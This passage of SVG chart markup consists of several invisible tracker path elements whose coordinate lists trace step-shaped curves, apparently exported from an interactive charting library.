253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 253.71428571428572 L 120.4744503862151 253.71428571428572 L 122.45008912655972 253.71428571428572 L 124.42572786690435 253.71428571428572 L 126.40136660724897 253.71428571428572 L 128.3770053475936 253.71428571428572 L 130.35264408793822 253.71428571428572 L 132.32828282828285 253.71428571428572 L 134.3039215686275 253.71428571428572 L 136.2795603089721 253.71428571428572 L 138.25519904931673 253.71428571428572 L 140.23083778966134 253.71428571428572 L 142.20647653000597 253.71428571428572 L 144.18211527035058 253.71428571428572 L 146.15775401069521 253.71428571428572 L 148.13339275103985 253.71428571428572 L 150.10903149138446 253.71428571428572 L 152.0846702317291 253.71428571428572 L 154.0603089720737 253.71428571428572 L 156.03594771241833 253.71428571428572 L 158.01158645276294 253.71428571428572 L 159.98722519310758 253.71428571428572 L 161.96286393345218 253.71428571428572 L 163.93850267379682 253.71428571428572 L 165.91414141414145 253.71428571428572 L 167.88978015448606 253.71428571428572 L 169.8654188948307 253.71428571428572 L 171.8410576351753 253.71428571428572 L 173.81669637551994 253.71428571428572 L 175.79233511586455 253.71428571428572 L 177.76797385620918 253.71428571428572 L 179.74361259655382 253.71428571428572 L 181.71925133689842 253.71428571428572 L 183.69489007724306 253.71428571428572 L 185.67052881758767 253.71428571428572 L 187.6461675579323 253.71428571428572 L 189.6218062982769 253.71428571428572 L 191.59744503862154 253.71428571428572 L 193.57308377896615 253.71428571428572 L 195.5487225193108 253.71428571428572 L 197.52436125965542 253.71428571428572 L 199.50000000000003 253.71428571428572 L 201.47563874034466 253.71428571428572 L 203.45127748068927 253.71428571428572 L 205.4269162210339 253.71428571428572 L 207.4025549613785 253.71428571428572 L 209.37819370172315 253.71428571428572 L 211.35383244206778 253.71428571428572 L 213.3294711824124 253.71428571428572 L 215.30510992275703 253.71428571428572 L 217.28074866310163 253.71428571428572 L 219.25638740344627 253.71428571428572 L 221.23202614379088 252.77909485714287 L 223.2076648841355 252.77909485714287 L 225.18330362448012 251.843904 L 227.15894236482475 251.38112914285713 L 229.1345811051694 249.09135771428572 L 231.110219845514 249.09135771428572 L 233.08585858585863 249.09135771428572 L 235.06149732620324 249.09135771428572 L 237.03713606654787 249.09135771428572 L 239.01277480689248 249.09135771428572 L 240.98841354723712 248.8401523809523 L 242.96405228758175 248.8401523809523 L 244.93969102792636 248.8401523809523 L 246.915329768271 248.50255451428555 L 248.8909685086156 248.19251565714268 L 250.86660724896024 246.34623679999982 L 252.84224598930484 244.44591679999982 L 254.81788472964945 243.25853394285696 L 256.79352346999406 240.3517293714284 L 258.7691622103387 237.44492479999982 L 260.7448009506833 234.04642194285697 L 262.72043969102793 232.60075794285697 L 264.69607843137254 231.12223794285697 L 266.6717171717172 228.9391392761875 L 268.6473559120618 226.61080327618748 L 270.6229946524064 223.79558956190175 L 272.598633392751 223.79558956190175 L 274.5742721330957 223.79558956190175 L 276.5499108734403 223.25954201904463 L 278.5255496137849 222.7119251047589 L 280.50118835412957 221.62826064761606 L 282.4768270944742 220.56773493333034 L 284.4524658348188 219.4917833904732 L 286.4281045751634 219.1543433904732 L 288.40374331550805 217.6966025904732 L 290.37938205585266 217.15284213333035 L 292.35502079619727 215.6989577904732 L 294.33065953654193 215.14941264761606 L 296.30629827688654 214.43226384761607 L 298.28193701723114 212.21094453333035 L 300.25757575757575 209.94106430475892 L 302.2332144979204 208.78364003047318 L 304.208853238265 208.52479733333067 L 306.1844919786096 208.3280638933307 L 308.1601307189543 207.5211002361878 L 310.1357694592989 206.71413657904498 L 312.1114081996435 206.10070617904495 L 314.0870469399881 205.51934526475924 L 316.0626856803328 204.8001160076164 L 318.0383244206774 204.12812835047356 L 320.013963161022 203.62100423618784 L 321.98960190136665 203.28645657904497 L 323.96524064171126 203.22465177904496 L 325.94087938205587 203.22465177904496 L 327.9165181224005 203.06460880761642 L 329.89215686274514 202.75609223618784 L 331.86779560308975 202.35598480761638 L 333.84343434343435 202.32579280761638 L 335.81907308377896 202.2708078476164 L 337.7947118241236 202.08043079618767 L 339.77035056446823 201.94783971047337 L 341.74598930481284 201.84401982475907 L 343.7216280451575 201.75719315809263 L 345.6972667855021 201.62124233142566 L 347.6729055258467 201.4586368457114 L 349.6485442661913 201.3706825599973 L 351.624183006536 201.2325413333307 L 353.5998217468806 201.18226869333068 L 355.5754604872252 200.70378046475923 L 357.55109922756986 200.70378046475923 L 359.52673796791447 200.70378046475923 L 361.5023767082591 200.70378046475923 L 363.4780154486037 200.70378046475923 L 365.45365418894835 200.70378046475923 L 367.42929292929296 200.70378046475923 L 369.40493166963756 200.0530033219021 L 371.3805704099822 199.58540789333068 L 373.35620915032683 198.7562696076164 L 375.33184789067144 197.34160949333068 L 377.30748663101605 196.16872387047354 L 379.2831253713607 195.06095655618782 L 381.2587641117053 194.14027815618783 L 383.2344028520499 193.44363454475928 L 385.2100415923946 193.44363454475928 L 387.1856803327392 193.44363454475928 L 389.1613190730838 192.3544097980925 L 391.1369578134284 190.75367506285443 L 393.1125965537731 190.161404434283 L 395.0882352941177 189.5237679999973 L 405.0882352941177 189.5237679999973" fill="none" isTracker="true" stroke-opacity="0.000001" stroke="rgb(192,192,192)" stroke-width="22" visibility="visible" zIndex="1" style=""></path><path d="M -6.088235294117647 253.71428571428572 L 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 253.71428571428572 L 120.4744503862151 253.71428571428572 L 122.45008912655972 253.71428571428572 L 124.42572786690435 253.71428571428572 L 126.40136660724897 253.71428571428572 L 128.3770053475936 253.71428571428572 L 130.35264408793822 253.71428571428572 L 132.32828282828285 253.71428571428572 L 134.3039215686275 253.71428571428572 L 136.2795603089721 253.71428571428572 L 138.25519904931673 253.71428571428572 L 140.23083778966134 253.71428571428572 L 142.20647653000597 253.71428571428572 L 144.18211527035058 253.71428571428572 L 146.15775401069521 253.71428571428572 L 148.13339275103985 253.71428571428572 L 150.10903149138446 253.71428571428572 L 152.0846702317291 253.71428571428572 L 154.0603089720737 253.71428571428572 L 156.03594771241833 253.71428571428572 L 158.01158645276294 253.71428571428572 L 159.98722519310758 253.71428571428572 L 161.96286393345218 253.71428571428572 L 163.93850267379682 253.71428571428572 L 165.91414141414145 253.71428571428572 L 167.88978015448606 253.71428571428572 L 169.8654188948307 253.71428571428572 L 171.8410576351753 253.67094624 L 173.81669637551994 253.67094624 L 175.79233511586455 253.67094624 L 177.76797385620918 253.67094624 L 179.74361259655382 253.59960178285715 L 181.71925133689842 253.59960178285715 L 183.69489007724306 253.59960178285715 L 185.67052881758767 253.59960178285715 L 187.6461675579323 253.59960178285715 L 189.6218062982769 253.59960178285715 L 191.59744503862154 253.59960178285715 L 193.57308377896615 253.59960178285715 L 195.5487225193108 253.59960178285715 L 197.52436125965542 253.59960178285715 L 199.50000000000003 253.59960178285715 L 201.47563874034466 251.81852749714284 L 203.45127748068927 251.81852749714284 L 205.4269162210339 251.81852749714284 L 207.4025549613785 249.76778537142857 L 209.37819370172315 249.76778537142857 L 211.35383244206778 249.76778537142857 L 213.3294711824124 247.78257257142857 L 215.30510992275703 244.52000982857143 L 217.28074866310163 242.13382697142856 L 219.25638740344627 238.89922354285716 L 221.23202614379088 236.19970354285715 L 223.2076648841355 232.00580639999998 L 225.18330362448012 229.18369165714284 L 227.15894236482475 229.18369165714284 L 229.1345811051694 229.18369165714284 L 231.110219845514 225.49138765714287 L 233.08585858585863 222.84007337142856 L 235.06149732620324 222.84007337142856 L 237.03713606654787 222.84007337142856 L 239.01277480689248 222.84007337142856 L 240.98841354723712 222.84007337142856 L 242.96405228758175 222.84007337142856 L 244.93969102792636 222.84007337142856 L 246.915329768271 222.84007337142856 L 248.8909685086156 222.84007337142856 L 250.86660724896024 222.84007337142856 L 252.84224598930484 222.84007337142856 L 254.81788472964945 222.84007337142856 L 256.79352346999406 222.84007337142856 L 258.7691622103387 222.84007337142856 L 260.7448009506833 222.84007337142856 L 262.72043969102793 222.84007337142856 L 264.69607843137254 222.84007337142856 L 266.6717171717172 222.84007337142856 L 268.6473559120618 222.84007337142856 L 270.6229946524064 222.84007337142856 L 272.598633392751 222.84007337142856 L 274.5742721330957 222.84007337142856 L 276.5499108734403 222.84007337142856 L 278.5255496137849 222.84007337142856 L 280.50118835412957 222.84007337142856 L 282.4768270944742 222.84007337142856 L 284.4524658348188 222.84007337142856 L 286.4281045751634 222.84007337142856 L 288.40374331550805 222.84007337142856 L 290.37938205585266 222.3233081142857 L 292.35502079619727 218.68215291428572 L 294.33065953654193 216.05976205714285 L 296.30629827688654 216.05976205714285 L 298.28193701723114 216.05976205714285 L 300.25757575757575 216.05976205714285 L 302.2332144979204 216.05976205714285 L 304.208853238265 216.05976205714285 L 306.1844919786096 216.05976205714285 L 308.1601307189543 216.05976205714285 L 310.1357694592989 216.05976205714285 L 312.1114081996435 216.05976205714285 L 314.0870469399881 216.05976205714285 L 316.0626856803328 214.66358925714286 L 318.0383244206774 212.95023977142858 L 320.013963161022 212.11670377142858 L 321.98960190136665 210.39279977142857 L 323.96524064171126 208.80962262857142 L 325.94087938205587 208.14216236190396 L 327.9165181224005 206.58029721904683 L 329.89215686274514 204.08420533333253 L 331.86779560308975 204.08420533333253 L 333.84343434343435 204.08420533333253 L 335.81907308377896 204.08420533333253 L 337.7947118241236 204.08420533333253 L 339.77035056446823 204.08420533333253 L 341.74598930481284 204.08420533333253 L 343.7216280451575 204.08420533333253 L 345.6972667855021 204.08420533333253 L 347.6729055258467 204.08420533333253 L 349.6485442661913 204.08420533333253 L 351.624183006536 204.08420533333253 L 353.5998217468806 204.08420533333253 L 355.5754604872252 204.08420533333253 L 357.55109922756986 203.41437481142773 L 359.52673796791447 202.979001097142 L 361.5023767082591 202.91611378285629 L 363.4780154486037 202.78322951618966 L 365.45365418894835 202.78322951618966 L 367.42929292929296 202.78322951618966 L 369.40493166963756 202.78322951618966 L 371.3805704099822 202.78322951618966 L 373.35620915032683 202.78322951618966 L 375.33184789067144 202.78322951618966 L 377.30748663101605 202.78322951618966 L 379.2831253713607 202.78322951618966 L 381.2587641117053 202.71848163047542 L 383.2344028520499 202.66020853333254 L 385.2100415923946 202.21285950476113 L 387.1856803327392 201.68117584761825 L 389.1613190730838 201.0676947047611 L 391.1369578134284 200.80870316190396 L 393.1125965537731 200.71225113904683 L 395.0882352941177 200.56906156190382 L 405.0882352941177 200.56906156190382" fill="none" isTracker="true" stroke-opacity="0.000001" stroke="rgb(192,192,192)" stroke-width="22" visibility="visible" zIndex="1" style=""></path><path d="M -6.088235294117647 253.71428571428572 L 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 252.16984510476246 L 120.4744503862151 252.16984510476246 L 122.45008912655972 252.16984510476246 L 124.42572786690435 252.16984510476246 L 126.40136660724897 252.16984510476246 L 128.3770053475936 252.16984510476246 L 130.35264408793822 252.16984510476246 L 132.32828282828285 252.16984510476246 L 134.3039215686275 252.16984510476246 L 136.2795603089721 252.16984510476246 L 138.25519904931673 252.16984510476246 L 140.23083778966134 252.16984510476246 L 142.20647653000597 252.16984510476246 L 144.18211527035058 252.16984510476246 L 146.15775401069521 252.16984510476246 L 148.13339275103985 252.16984510476246 L 150.10903149138446 252.16984510476246 L 152.0846702317291 252.16984510476246 L 154.0603089720737 252.16984510476246 L 156.03594771241833 252.16984510476246 L 158.01158645276294 252.16984510476246 L 159.98722519310758 252.16984510476246 L 161.96286393345218 252.16984510476246 L 163.93850267379682 252.16984510476246 L 165.91414141414145 252.16984510476246 L 167.88978015448606 252.16984510476246 L 169.8654188948307 252.16984510476246 L 171.8410576351753 252.16984510476246 L 173.81669637551994 252.16984510476246 L 175.79233511586455 252.16984510476246 L 177.76797385620918 252.16984510476246 L 179.74361259655382 252.16984510476246 L 181.71925133689842 252.16984510476246 L 183.69489007724306 252.16984510476246 L 185.67052881758767 252.16984510476246 L 187.6461675579323 252.16984510476246 L 189.6218062982769 252.16984510476246 L 191.59744503862154 252.16984510476246 L 193.57308377896615 252.16984510476246 L 195.5487225193108 252.16984510476246 L 197.52436125965542 252.16984510476246 L 199.50000000000003 252.16984510476246 L 201.47563874034466 252.16984510476246 L 203.45127748068927 252.16984510476246 L 205.4269162210339 252.16984510476246 L 207.4025549613785 252.16984510476246 L 209.37819370172315 252.16984510476246 L 211.35383244206778 252.16984510476246 L 213.3294711824124 252.16984510476246 L 215.30510992275703 252.16984510476246 L 217.28074866310163 238.12117767619102 L 219.25638740344627 227.70874339047674 L 221.23202614379088 214.29309310476248 L 223.2076648841355 207.177929676191 L 225.18330362448012 207.177929676191 L 227.15894236482475 207.177929676191 L 229.1345811051694 207.177929676191 L 231.110219845514 207.177929676191 L 233.08585858585863 207.177929676191 L 235.06149732620324 207.177929676191 L 237.03713606654787 207.177929676191 L 239.01277480689248 207.177929676191 L 240.98841354723712 207.177929676191 L 242.96405228758175 207.177929676191 L 244.93969102792636 207.177929676191 L 246.915329768271 207.177929676191 L 248.8909685086156 207.02913244952424 L 250.86660724896024 207.02913244952424 L 252.84224598930484 207.02913244952424 L 254.81788472964945 207.02913244952424 L 256.79352346999406 207.02913244952424 L 258.7691622103387 207.02913244952424 L 260.7448009506833 204.71985884952426 L 262.72043969102793 203.61855617523855 L 264.69607843137254 202.57059100952426 L 266.6717171717172 201.221426956191 L 268.6473559120618 201.221426956191 L 270.6229946524064 201.221426956191 L 272.598633392751 201.221426956191 L 274.5742721330957 201.221426956191 L 276.5499108734403 201.221426956191 L 278.5255496137849 201.221426956191 L 280.50118835412957 201.221426956191 L 282.4768270944742 201.221426956191 L 284.4524658348188 201.221426956191 L 286.4281045751634 201.221426956191 L 288.40374331550805 201.221426956191 L 290.37938205585266 201.221426956191 L 292.35502079619727 201.221426956191 L 294.33065953654193 201.221426956191 L 296.30629827688654 201.221426956191 L 298.28193701723114 201.221426956191 L 300.25757575757575 201.221426956191 L 302.2332144979204 201.221426956191 L 304.208853238265 201.221426956191 L 306.1844919786096 201.221426956191 L 308.1601307189543 201.221426956191 L 310.1357694592989 201.221426956191 L 312.1114081996435 201.221426956191 L 314.0870469399881 201.221426956191 L 316.0626856803328 201.221426956191 L 318.0383244206774 201.221426956191 L 320.013963161022 201.221426956191 L 321.98960190136665 201.221426956191 L 323.96524064171126 201.221426956191 L 325.94087938205587 201.221426956191 L 327.9165181224005 201.221426956191 L 329.89215686274514 201.221426956191 L 331.86779560308975 201.221426956191 L 333.84343434343435 201.221426956191 L 335.81907308377896 201.221426956191 L 337.7947118241236 201.221426956191 L 339.77035056446823 201.221426956191 L 341.74598930481284 201.221426956191 L 343.7216280451575 201.221426956191 L 345.6972667855021 201.221426956191 L 347.6729055258467 201.221426956191 L 349.6485442661913 201.221426956191 L 351.624183006536 201.221426956191 L 353.5998217468806 201.221426956191 L 355.5754604872252 201.221426956191 L 357.55109922756986 201.21215623619105 L 359.52673796791447 201.21215623619105 L 361.5023767082591 201.21215623619105 L 363.4780154486037 201.21215623619105 L 365.45365418894835 201.21215623619105 L 367.42929292929296 201.21215623619105 L 369.40493166963756 201.21215623619105 L 371.3805704099822 201.21215623619105 L 373.35620915032683 201.21215623619105 L 375.33184789067144 201.21215623619105 L 377.30748663101605 201.21215623619105 L 379.2831253713607 201.21215623619105 L 381.2587641117053 201.21215623619105 L 383.2344028520499 201.21215623619105 L 385.2100415923946 201.21215623619105 L 387.1856803327392 201.21215623619105 L 389.1613190730838 201.21215623619105 L 391.1369578134284 201.21215623619105 L 393.1125965537731 201.17433589333388 L 395.0882352941177 201.17433589333388 L 405.0882352941177 201.17433589333388" fill="none" isTracker="true" stroke-opacity="0.000001" stroke="rgb(192,192,192)" stroke-width="22" visibility="visible" zIndex="1" style=""></path><path d="M -6.088235294117647 253.71428571428572 L 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 253.71428571428572 L 120.4744503862151 253.71428571428572 L 122.45008912655972 253.71428571428572 L 124.42572786690435 253.71428571428572 L 126.40136660724897 253.71428571428572 L 128.3770053475936 253.71428571428572 L 130.35264408793822 253.71428571428572 L 132.32828282828285 253.71428571428572 L 134.3039215686275 253.71428571428572 L 136.2795603089721 253.71428571428572 L 138.25519904931673 253.71428571428572 L 140.23083778966134 253.71428571428572 L 142.20647653000597 253.71428571428572 L 144.18211527035058 253.71428571428572 L 146.15775401069521 253.71428571428572 L 148.13339275103985 253.71428571428572 L 150.10903149138446 253.71428571428572 L 152.0846702317291 253.71428571428572 L 154.0603089720737 253.71428571428572 L 156.03594771241833 253.71428571428572 L 158.01158645276294 253.71428571428572 L 159.98722519310758 253.71428571428572 L 161.96286393345218 253.71428571428572 L 163.93850267379682 253.71428571428572 L 165.91414141414145 253.71428571428572 L 167.88978015448606 253.71428571428572 L 169.8654188948307 253.71428571428572 L 171.8410576351753 253.71428571428572 L 173.81669637551994 253.71428571428572 L 175.79233511586455 253.71428571428572 L 177.76797385620918 253.71428571428572 L 179.74361259655382 253.71428571428572 L 181.71925133689842 253.71428571428572 L 183.69489007724306 253.71428571428572 L 185.67052881758767 253.71428571428572 L 187.6461675579323 253.71428571428572 L 189.6218062982769 253.71428571428572 L 191.59744503862154 253.71428571428572 L 193.57308377896615 253.71428571428572 L 195.5487225193108 253.71428571428572 L 197.52436125965542 253.71428571428572 L 199.50000000000003 253.71428571428572 L 201.47563874034466 253.71428571428572 L 203.45127748068927 253.71428571428572 L 205.4269162210339 253.71428571428572 L 207.4025549613785 253.71428571428572 L 209.37819370172315 253.71428571428572 L 211.35383244206778 253.71428571428572 L 213.3294711824124 253.71428571428572 L 215.30510992275703 253.71428571428572 L 217.28074866310163 253.71428571428572 L 219.25638740344627 253.71428571428572 L 221.23202614379088 253.71428571428572 L 223.2076648841355 253.71428571428572 L 225.18330362448012 253.71428571428572 L 227.15894236482475 253.71428571428572 L 229.1345811051694 253.71428571428572 L 231.110219845514 253.71428571428572 L 233.08585858585863 253.71428571428572 L 235.06149732620324 253.71428571428572 L 237.03713606654787 253.71428571428572 L 239.01277480689248 253.71428571428572 L 240.98841354723712 253.71428571428572 L 242.96405228758175 253.33168457142858 L 244.93969102792636 253.33168457142858 L 246.915329768271 253.33168457142858 L 248.8909685086156 253.33168457142858 L 250.86660724896024 253.33168457142858 L 252.84224598930484 252.76336457142855 L 254.81788472964945 252.76336457142855 L 256.79352346999406 252.76336457142855 L 258.7691622103387 252.76336457142855 L 260.7448009506833 252.76336457142855 L 262.72043969102793 252.76336457142855 L 264.69607843137254 252.76336457142855 L 266.6717171717172 252.76336457142855 L 268.6473559120618 252.76336457142855 L 270.6229946524064 252.76336457142855 L 272.598633392751 252.76336457142855 L 274.5742721330957 251.38874057142857 L 276.5499108734403 251.38874057142857 L 278.5255496137849 250.5210377142857 L 280.50118835412957 242.97202285714286 L 282.4768270944742 239.67475199999998 L 284.4524658348188 239.5002473142857 L 286.4281045751634 239.40540891428572 L 288.40374331550805 238.96866514285713 L 290.37938205585266 238.4470793142857 L 292.35502079619727 237.40872822857142 L 294.33065953654193 236.88232182857143 L 296.30629827688654 236.78428662857144 L 298.28193701723114 236.78428662857144 L 300.25757575757575 236.78428662857144 L 302.2332144979204 236.2457628342857 L 304.208853238265 233.72709488761555 L 306.1844919786096 232.94386310094876 L 308.1601307189543 232.94386310094876 L 310.1357694592989 232.85709281523447 L 312.1114081996435 227.38980367237735 L 314.0870469399881 218.80050950094878 L 316.0626856803328 212.05267361523448 L 318.0383244206774 205.77436138666306 L 320.013963161022 201.20253144380592 L 321.98960190136665 201.20253144380592 L 323.96524064171126 201.20253144380592 L 325.94087938205587 201.20253144380592 L 327.9165181224005 201.20253144380592 L 329.89215686274514 201.20253144380592 L 331.86779560308975 201.20253144380592 L 333.84343434343435 201.20253144380592 L 335.81907308377896 201.20253144380592 L 337.7947118241236 201.20253144380592 L 339.77035056446823 201.20253144380592 L 341.74598930481284 201.20253144380592 L 343.7216280451575 201.20253144380592 L 345.6972667855021 201.20253144380592 L 347.6729055258467 201.20253144380592 L 349.6485442661913 201.20253144380592 L 351.624183006536 201.20253144380592 L 353.5998217468806 201.20253144380592 L 355.5754604872252 201.20253144380592 L 357.55109922756986 201.20253144380592 L 359.52673796791447 201.20253144380592 L 361.5023767082591 201.20253144380592 L 363.4780154486037 201.20253144380592 L 365.45365418894835 201.20253144380592 L 367.42929292929296 201.20253144380592 L 369.40493166963756 201.20253144380592 L 371.3805704099822 201.20253144380592 L 373.35620915032683 201.20253144380592 L 375.33184789067144 201.20253144380592 L 377.30748663101605 201.20253144380592 L 379.2831253713607 201.20253144380592 L 381.2587641117053 201.20253144380592 L 383.2344028520499 201.20253144380592 L 385.2100415923946 201.20253144380592 L 387.1856803327392 201.20253144380592 L 389.1613190730838 201.20253144380592 L 391.1369578134284 201.20253144380592 L 393.1125965537731 201.20253144380592 L 395.0882352941177 201.20253144380592 L 405.0882352941177 201.20253144380592" fill="none" isTracker="true" stroke-opacity="0.000001" stroke="rgb(192,192,192)" stroke-width="22" visibility="visible" zIndex="1" style=""></path><path d="M -6.088235294117647 253.71428571428572 L 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.70639689142857 L 67.13220439691028 253.70639689142857 L 69.1078431372549 253.70639689142857 L 71.08348187759952 253.70639689142857 L 73.05912061794415 253.70639689142857 L 75.03475935828877 253.70639689142857 L 77.0103980986334 253.70639689142857 L 78.98603683897802 253.70639689142857 L 80.96167557932264 253.70639689142857 L 82.93731431966727 253.70639689142857 L 84.91295306001189 253.70639689142857 L 86.88859180035651 253.70639689142857 L 88.86423054070113 253.70639689142857 L 90.83986928104575 253.70639689142857 L 92.81550802139039 253.70639689142857 L 94.791146761735 253.70639689142857 L 96.76678550207963 253.70639689142857 L 98.74242424242425 253.70639689142857 L 100.71806298276887 253.70639689142857 L 102.69370172311349 253.70639689142857 L 104.66934046345811 253.70639689142857 L 106.64497920380273 253.70639689142857 L 108.62061794414737 253.70639689142857 L 110.59625668449199 253.5550309485714 L 112.57189542483661 253.5550309485714 L 114.54753416518123 253.47725737142858 L 116.52317290552585 253.44091759238088 L 118.49881164587048 253.44091759238088 L 120.4744503862151 253.38685953523805 L 122.45008912655972 253.38685953523805 L 124.42572786690435 253.38685953523805 L 